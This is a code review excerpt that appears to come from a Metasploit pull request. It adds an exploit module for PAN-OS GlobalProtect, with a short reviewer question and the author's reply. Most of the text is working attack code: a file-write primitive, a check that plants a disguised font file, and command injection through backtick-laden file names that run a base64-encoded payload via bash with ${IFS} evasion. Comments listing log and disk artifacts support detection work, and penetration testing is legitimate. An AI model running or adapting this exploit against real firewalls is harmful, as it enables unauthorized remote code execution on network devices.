modules/exploits/linux/http/panos_telemetry_cmd_exec.rb

```diff
@@ -0,0 +1,131 @@
+            # The NGINX frontend web server, which proxies requests to the GlobalProtect service, will log client IPs in /var/log/nginx/sslvpn_access.log.
+            # Similarly, the log file /var/log/pan/sslvpn-access/sslvpn-access.log will also contain a log of the HTTP requests.
+            # The "device_telemetry_*.log" files in /var/log/pan will log the command being injected.
+            ARTIFACTS_ON_DISK
+            # Several 0 length files are created in the following directories during exploitation:
+            # - /opt/panlogs/tmp/device_telemetry/day/
+            # - /opt/panlogs/tmp/device_telemetry/hour/
+            # - /opt/panlogs/tmp/device_telemetry/minute/
+            # - /var/appweb/sslvpndocs/global-protect/portal/fonts/
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'An existing web application endpoint', '/global-protect/login.esp']),
+      ]
+    )
+  end
+
+  def check
+    # Try to create a new empty file in an accessible directory with the exploit primitive
+    file_check_name = "glyphicons-#{Rex::Text.rand_text_alpha_lower(8)}-regular.woff2"
+    touch_file("/var/appweb/sslvpndocs/global-protect/portal/fonts/#{file_check_name}")
+
+    # Access that file and a file that doesn't exist to confirm they return 403 and 404, respectively
+    res_check_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/#{file_check_name}")
+    )
+
+    res_check_not_created = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri("/global-protect/portal/fonts/X#{file_check_name}")
+    )
+
+    if (res_check_created&.code != 403) || (res_check_not_created&.code != 404)
+      fail_with(Failure::UnexpectedReply, 'Arbitrary file write did not succeed!')
+    end
+
+    remote_prot_scheme = datastore['SSL'] == true ? 'https://' : 'http://'
+    remote_host = datastore['VHOST'] || datastore['RHOST']
+    print_status("Arbitrary file write succeeded: #{remote_prot_scheme}#{remote_host}:#{datastore['RPORT']}/global-protect/portal/fonts/#{file_check_name}")
+    print_status('Note: This file will not be deleted by the module.')
+
+    CheckCode::Appears
+  end
+
+  def execute_command(cmd)
+    # Encode the shell command payload as base64, then embed it in the appropriate exploitation context
+    cmd = "echo${IFS}-n${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash${IFS}-"
+
+    # Create maliciously named files in all three possible telemetry directories
+    touch_file("/opt/panlogs/tmp/device_telemetry/hour/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+    touch_file("/opt/panlogs/tmp/device_telemetry/day/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
+    touch_file("/opt/panlogs/tmp/device_telemetry/minute/#{Rex::Text.rand_text_alpha_lower(4)}`#{cmd}`")
```

Comment:
What determines which of these files gets executed?

Reply:
That's a good question, so I addressed this in comments within the module. Different versions and configurations of PAN-OS trigger payloads in different locations. I also removed an unnecessary injection point, taking the files touched from 3->2.